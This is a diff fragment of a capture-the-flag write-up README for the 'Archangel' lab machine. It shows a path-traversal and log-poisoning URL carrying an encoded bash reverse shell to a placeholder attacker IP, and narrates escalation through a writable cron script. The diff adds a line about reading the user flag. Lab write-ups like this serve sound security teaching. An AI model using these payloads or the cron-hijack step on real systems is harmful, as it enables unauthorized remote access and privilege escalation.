realatharva15/archangel_writeup/README.md

 ```bash
 http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/<attacker_ip>/4444%200%3E%261%27
 ```
-we finally get a shell as www-data. now lets quickly enumerate the machine by running the linpeas.sh script. after analyzing the output of the linpeas.sh script, we find out that there is a cronjob that runs every minute as archangel. the script used in the cron job is /opt/helloworld.sh. the good news is that we have write permissions to the script! lets add a revershell to the script which will grant us a shell as archangel
+we finally get a shell as www-data. we will read the user.txt flag present at /home/archangel/user.txt location and submit it. now lets quickly enumerate the machine by running the linpeas.sh script. after analyzing the output of the linpeas.sh script, we find out that there is a cronjob that runs every minute as archangel. the script used in the cron job is /opt/helloworld.sh. the good news is that we have write permissions to the script! lets add a revershell to the script which will grant us a shell as archangel

+# Shell as archangel:

 ```bash
 #first setup a netcat listener